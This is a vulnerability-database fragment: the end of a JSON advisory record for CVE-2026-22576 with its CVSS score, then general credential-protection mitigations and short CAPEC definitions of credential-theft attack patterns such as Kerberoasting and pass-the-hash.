      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22576"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-104"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Use an appropriate security mechanism to protect the credentials.

Mitigation
Architecture and Design

Make appropriate use of cryptography to protect the credentials.

Mitigation
Implementation

Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.).

CAPEC-102: Session Sidejacking

Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.

CAPEC-474: Signature Spoofing by Key Theft

An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.

CAPEC-50: Password Recovery Exploitation

An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.

CAPEC-509: Kerberoasting

Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.

CAPEC-551: Modify Existing Service

When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.

CAPEC-555: Remote Services with Stolen Credentials

This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.

CAPEC-560: Use of Known Domain Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.

CAPEC-561: Windows Admin Shares with Stolen Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.

CAPEC-600: Credential Stuffing

An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.

CAPEC-644: Use of Captured Hashes (Pass The Hash)

An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.

CAPEC-645: Use of Captured Tickets (Pass The Ticket)

An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.

CAPEC-652: Use of Known Kerberos Credentials

An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.

CAPEC-653: Use of Known Operating System Credentials

An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.